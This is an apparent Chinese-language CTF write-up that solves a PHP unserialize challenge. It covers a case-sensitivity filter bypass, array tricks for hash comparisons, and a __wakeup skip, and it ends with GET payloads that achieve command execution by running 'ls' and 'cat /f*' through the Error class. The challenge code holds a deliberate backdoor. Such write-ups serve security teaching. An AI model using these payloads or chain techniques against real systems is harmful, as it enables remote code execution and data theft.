姿势
题目给出以下代码:
<?php
error_reporting(0);
function backdoor()
{
$a = $_GET["a"];
$b = $_GET["b"];
$d = $_GET["d"];
$e = $_GET["e"];
$f = $_GET["f"];
$g = $_GET["g"];
$class = new $a($b);
$str1 = substr($class, $d, $e);
$str2 = substr($class, $f, $g);
$str1($str2);
}
class popko
{
public $left;
public $right;
public function __call($method,$args)
{
if (($this->left != $this->right) && (md5($this->left) === md5($this->right)) && (sha1($this->left) === sha1($this->right))) {
echo "backdoor is here";
backdoor();
}
}
public function __wakeup()
{
$this->left = "";
$this->right = "";
}
}
class pipimi
{
function __destruct()
{
echo $this->a->a();
}
}
$c = $_GET["c"];
if ($c != null) {
if (strstr($_GET["c"], "popko") === false) {
unserialize($_GET["c"]);
} else {
echo ":)";
}
} else {
highlight_file(__FILE__);
}
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用
故需要运行call方法
而call方法是在对象上下文中调用不可访问的方法
时触发的
故需要调用不可访问的方法
而恰巧destruct方法中并不存在a对象和a函数
故需要运行destruct方法
而destruct方法在对象被销毁时触发
如何实现对象被销毁呢?
当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法
所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destruct被执行后,调用popko类,从而运行call方法,进而调用backdoor函数
对于
if (strstr($_GET["c"], "popko") === false) {
unserialize($_GET["c"]);
} else {
echo ":)";
这串代码的意思是:当我们传入的c不含有popko时 ,将对传入的参数c进行反序列化;否则将打印:)
所以我们要传入一个参数c,让它实现反序列化,却又含有popko
由于PHP是一种弱语言,函数名、方法名、类名不区分大小写,即class Object 与 class object 在解析时被当作一个变量
而strstr函数是区分大小写的
所以可以利用类名大小写不敏感但过滤函数大小写敏感的特性,构造popko链子(将popko改为Popko)
对于
if (($this->left != $this->right) && (md5($this->left) === md5($this->right)) && (sha1($this->left) === sha1($this->right))) {
echo "backdoor is here";
backdoor();
}
要求left和right值不同,但md5加密所得的值相同,才能调用backdoor()函数
故使用数组传参绕过,即left[]=1&right[]=2
所以构造的链子为:
/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":2:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}
对象类名是 "pipimi",有一个属性 "a"。
"a" 属性的值是另一个对象类型 "Popko"。
"Popko" 对象有两个属性: "left" 和 "right"。
"left" 属性是一个包含一个元素的数组,该元素的值为 1。
"right" 属性是一个包含一个元素的数组,该元素的值为 2。
而执行unserialize()时,先会调用wakeup方法,如何绕过呢?
当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeup方法的执行
所以将Popko的属性个数值增加为3即可:
/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":3:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}
回显如下:
成功进入后门
接着我们看看后门函数是怎么描述的:
function backdoor()
{
$a = $_GET["a"];
$b = $_GET["b"];
$d = $_GET["d"];
$e = $_GET["e"];
$f = $_GET["f"];
$g = $_GET["g"];
$class = new $a($b);
$str1 = substr($class, $d, $e);
$str2 = substr($class, $f, $g);
$str1($str2);}
$class = new $a($b);
此语句new了新的类,但不可进行反序列化,这就遇到了需要反序列化但没有指定类的情况,所以只能找到PHP内置类(即原生类)来进行反序列化。
对于参数a,使用原生类中的error类即可
看看substr函数的语法:
故POC构造如下:
/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":3:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}&a=Error&b=systemls&d=7&e=6&f=13&g=2
回显如下:
使用命令抓取f开头的所有文件的内容即可:
/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":3:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}&a=Error&b=systemcat /f*&d=7&e=6&f=13&g=7
其中,d、e、f、g的值需根据回显不断修改
得到flag:
总结
以上为一次PHP序列化反序列化解题详析记录,考察php代码审计、php强比较、序列化反序列化等知识点。
我是秋说,我们下次见。